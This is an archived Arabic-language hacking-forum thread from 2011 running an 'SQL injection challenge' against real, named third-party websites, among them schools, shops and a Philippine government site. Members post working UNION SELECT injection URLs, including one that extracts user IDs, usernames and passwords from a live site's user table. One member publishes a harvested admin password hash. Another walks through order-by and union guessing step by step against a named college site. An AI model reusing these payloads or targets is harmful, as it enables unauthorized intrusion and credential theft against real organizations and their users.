:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   {SQL}تحدي SQL (http://www.vbspiders.com/vb/t58842.html)

CODE3 10-02-2011 04:21 PM

{SQL}تحدي SQL
 
THIS IS THE CHALLENGE

Target
Code:

كود PHP:

http://www.vedanta.edu.in/page.php?id=5 


Level


Medium



Rules:

  • No Tools
  • No Blind
  • Don't Forget Rules 1,2

solvers list
1.
2.
3.
4.
5.


لاتضع الحل عند الرد
ارسل الحل برسالة خاصة










http://nd3.upanh.com/b2.s1.d2/39f285...43.vedanta.png



Dr.MwNs 10-02-2011 04:23 PM

رد: {SQL}تحدي SQL
 
هه

بالتوفيق ^_^

abdellatef 10-02-2011 05:11 PM

رد: {SQL}تحدي SQL
 
جاري الحقن

المفترس 10-02-2011 05:22 PM

رد: {SQL}تحدي SQL
 
سيتم الحقن بادن الله

abdellatef 10-02-2011 05:26 PM

رد: {SQL}تحدي SQL
 
تحياتي لك :surrender::surrender::surrender:
ما قدرت احقنه مشكلة عدم معرفة العمود المصاب
لي مدة لم احقن لو تضع الحل بفديو يكون احسن لاني جربت كل شيء ترميز coder تشفير الاكواد
http://www.vedanta.edu.in/page.php?i...14,15,16,17,18

السكريبت هدا الاستغلال له اي موقع مصاب من هدا السكريبت
http://www.matrixshows.com.br/qry.ph...dministracao--

abdellatef 10-02-2011 05:27 PM

رد: {SQL}تحدي SQL
 
ننتضرك يا مفترس الغالي لاني فشلت :(

المفترس 10-02-2011 05:59 PM

رد: {SQL}تحدي SQL
 
تم الحقن

abdellatef 10-02-2011 06:05 PM

رد: {SQL}تحدي SQL
 
ارسل لي الاستغلال لاشوف كيف تخطيته يا بطلنا الاسد

abdellatef 10-02-2011 06:06 PM

رد: {SQL}تحدي SQL
 
وضع انت ايضا هدف للتحدي يكون قوي نحقنه يدوي

EvilGue 10-03-2011 03:09 PM

رد: {SQL}تحدي SQL
 
بدأت الحقن

oussama.ha 10-03-2011 04:28 PM

رد: {SQL}تحدي SQL
 
اخي ممكن تنزل رابط الحقنة لنستفييد منها

مذكرة الموت 10-04-2011 01:08 PM

رد: {SQL}تحدي SQL
 
شباب لاقيت الحل لكم لحل انتكم تحقنو في متغير اخر في الموقع الملف هاذا قاعده وهميه

مذكرة الموت 10-04-2011 01:16 PM

رد: {SQL}تحدي SQL
 
ههههههههههه وفي خدعه قذره في الموقع
خخخ تم الحقن
ويعجبني اخي حاولت تخدع الجميع في الصورة الي حطيتها هههههه
العب بعيد

المفترس 10-04-2011 04:12 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة oussama.ha (المشاركة 401666)
اخي ممكن تنزل رابط الحقنة لنستفييد منها


اسف على التاخير لم ارى ردك

هههه ساتخطى القوانين التي وضعها اخونا

كود PHP:

http://www.vedanta.edu.in/video.php?id=47&sid=-48 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 


المفترس 10-04-2011 04:44 PM

رد: {SQL}تحدي SQL
 
http://www.segundoidioma.com/page.php?Id=0

موقع سهل لتدريب فيه فقط شيء بسيط تخطوه

مذكرة الموت 10-04-2011 07:01 PM

رد: {SQL}تحدي SQL
 
اخي سليم الله يسامحك على ذي المواقع الي حتى المبتدى حرام يحاول فيها:biggrin:

طيب ممكن موقع حقنته دوبل كيري عشان نتسلى فيه اذا سمحت طبعا:blushing:

المفترس 10-04-2011 07:44 PM

رد: {SQL}تحدي SQL
 
بما انك قلت( اقصد الاخ مدكرة الموت) دلك الكلام فانا ساعطيك موقع يليق بك


وطبعا هدا خاص لك

وورين شطارتك يا حلو


كود PHP:

PHP***93;http://www.falkiaviation.com/page.php?page_id=10 

[/php]

اما لاخوة الاخرين فحاولو في هدا


http://www.mshop.ir/detail.php?id=302

المفترس 10-04-2011 07:47 PM

رد: {SQL}تحدي SQL
 
على فكرة التاني ايضا فيه شيء ظريف الدي يحقنه يقولها لاخوة

المفترس 10-04-2011 08:19 PM

رد: {SQL}تحدي SQL
 
اخ مذكرة الموت الموقع الدي طلبته حقنته Double query


http://www.maxprotech.com/maxpro-pro...ail.php?id=-89

مذكرة الموت 10-04-2011 09:05 PM

رد: {SQL}تحدي SQL
 
الف شكر يا اخي الغالي
بالنسبه للموقع الي حطيته مشكلته جديده صراحه لاكن بحاول فيه ولا يهمك الى تخطي خليهاتحدي بيني وبينك يا مفترس
وشكرا على الدوبل كيري تسلم

مذكرة الموت 10-04-2011 09:09 PM

رد: {SQL}تحدي SQL
 
مفترس هاذا موقع لك وللاخوان موقع اسرئيلي بسيط
http://www.cfijerusalem.net/shop.php?id=6

مذكرة الموت 10-04-2011 10:58 PM

رد: {SQL}تحدي SQL
 
اقتباس:

اما لاخوة الاخرين فحاولو في هدا


http://www.mshop.ir/detail.php?id=302
الموقع صعب على الشباب لاكن حله عندي بتسلى فيه بينما ادور االحل للاخر
الادمن 2d0bfe90e76b7ae23361450882f3bb4d
الباس 2d0bfe90e76b7ae23361450882f3bb4d

الاثنين مشفرين والاثنين نفس بعضلوول

CODE3 10-05-2011 03:09 PM

رد: {SQL}تحدي SQL
 
الفائز في التحدي الاول هو:المفترس:clap::6:

التحدي الثاني

مستوى التحدي أصعب من الاول

كود PHP:

http://www.galilcol.ac.il/page.asp?id=17 



CODE3 10-05-2011 03:59 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة المفترس (المشاركة 401850)
بما انك قلت( اقصد الاخ مدكرة الموت) دلك الكلام فانا ساعطيك موقع يليق بك


وطبعا هدا خاص لك

اقتباس:

المشاركة الأصلية كتبت بواسطة المفترس (المشاركة 401850)
وورين شطارتك يا حلو


كود PHP:

PHP***93;http://www.falkiaviation.com/page.php?page_id=10 

[/php]

اما لاخوة الاخرين فحاولو في هدا










حقنة الموقع الثاني

والمعلومات تظهر اعلى المتصفح
32عمود العمود المصاب رقم 4


كود PHP:

http://www.mshop.ir/detail.php?id=-302+union+select+1,2,3,group_concat%28id,0x3a,user,0x3a,pass%29%20,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user 

حقنة الموقع الاول
الاصددار الرابع العن شي
عدد الاعمدة المصابة يمكن9:shutup:

لي عودة لحقنة لضيق الوقت:14:



CODE3 10-05-2011 04:04 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة مذكرة الموت (المشاركة 401898)
الموقع صعب على الشباب لاكن حله عندي بتسلى فيه بينما ادور االحل للاخر
الادمن 2d0bfe90e76b7ae23361450882f3bb4d
الباس 2d0bfe90e76b7ae23361450882f3bb4d

الاثنين مشفرين والاثنين نفس بعضلوول


ممنوع الحقن بالبرامجلوول

مذكرة الموت 10-05-2011 06:29 PM

رد: {SQL}تحدي SQL
 
اقتباس:

ممنوع الحقن بالبرامج
لو عرفت البرامج تحقن هل الموقع بعتزل الهاك

طيب ورينا شطارتك انت معاه

مذكرة الموت 10-05-2011 06:31 PM

رد: {SQL}تحدي SQL
 
وربي فله
انا حقنته امس دوبل كيري
ما كنت الاحظ فوق الشريط

المفترس 10-05-2011 08:33 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة CODE3 (المشاركة 401951)
الفائز في التحدي الاول هو:المفترس:clap::6:

التحدي الثاني

مستوى التحدي أصعب من الاول

كود PHP:

http://www.galilcol.ac.il/page.asp?id=17 



ساحاول معاه المهم تكون حقنته انت قبل ما تنزله
حقنته اليس كدلك

المفترس 10-05-2011 09:05 PM

رد: {SQL}تحدي SQL
 
اخي هدا ملف asp
مو php

مذكرة الموت 10-05-2011 09:27 PM

رد: {SQL}تحدي SQL
 
هات غيره هاذا asb سيرفر وندوز غثيث مره جيب موقع ثاني ويا حبذا يكون مستوى hard

aircrack -ng 10-05-2011 10:04 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة CODE3 (المشاركة 401951)
الفائز في التحدي الاول هو:المفترس:clap::6:

التحدي الثاني

مستوى التحدي أصعب من الاول

كود PHP:

http://www.galilcol.ac.il/page.asp?id=17 


هههههههههههههههههههه يلزم كيلو ونص تخمين عشان تضهر الاعمده المصابه وبعدها كيلو تخمين عشان تجيب الباس واليوزر

aircrack -ng 10-05-2011 10:11 PM

رد: {SQL}تحدي SQL
 
نعطي لمحه على هالنوع من الحقن
هون نستعمل الامر order by عادي
طيب طلع معانا 15 عمود
كود:

http://www.galilcol.ac.il/page.asp?id=17 order by 15
المرحله التانيه لازم نستعمل التخمين عشان تظهر الاعمده المصابه مثلا انا خمنت شوي ومانفع المهم نخمن مثلا هيك
كود:

http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+administratour
نفرض انو طلع معانا العمود المصاب 5 مكان العمود المصاب نجرب نخمن مثلا password وكمان username

مثلا

كود:

http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,password,6,7,8,9,10,11,12,13,14,15+from+administratour
هذا مجرد مثال

مذكرة الموت 10-05-2011 10:20 PM

رد: {SQL}تحدي SQL
 
هههههههههههه حلوه قصه الكيلو يا نسيم

CODE3 10-06-2011 02:52 PM

رد: {SQL}تحدي SQL
 
اقتباس:

المشاركة الأصلية كتبت بواسطة مذكرة الموت (المشاركة 402003)
هات غيره هاذا asb سيرفر وندوز غثيث مره جيب موقع ثاني ويا حبذا يكون مستوى hard


الهدف
كود PHP:

www.dbm.gov.ph/ro/index.php?code=ROVI&pid=288 

المستوى:
hard
http://img812.imageshack.us/img812/7...vphpbypass.png
:12::12::12::12:

تحياتي للجميع

EvilGue 10-06-2011 03:23 PM

رد: {SQL}تحدي SQL
 
و الله انا مبتدي بس هذا اللي قدرت اوصل له
الموقع هذا يحقن بالـ error based

لضيق الوقت و الدراسة ما قدرت اعمل شي

تحياتي للجميع =)

المفترس 10-06-2011 07:51 PM

رد: {SQL}تحدي SQL
 
صح المستوى hard

ولكن لا يهمك المفترس يفترس كل شيء

تم معرفة العواميد مصابة وجاري التكملة

المفترس 10-06-2011 08:50 PM

رد: {SQL}تحدي SQL
 
انا متوقف عند forbiden
وما استطعت تخطيها لكن ساحاول ولو تطلب اشهر

akeles 10-06-2011 09:48 PM

رد: {SQL}تحدي SQL
 
مشكورررر أخي

EvilGue 10-07-2011 01:44 AM

رد: {SQL}تحدي SQL
 
تم الحل
اعني الموقع الاول ارسلته على الخاص

EvilGue 10-07-2011 01:53 AM

رد: {SQL}تحدي SQL
 
ههه باقيلي 35 مشاركة على ما اقدر ارسله لك اشوفك بعدين هذي صورة
http://oi55.tinypic.com/kedzcm.jpg


الساعة الآن 09:31 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0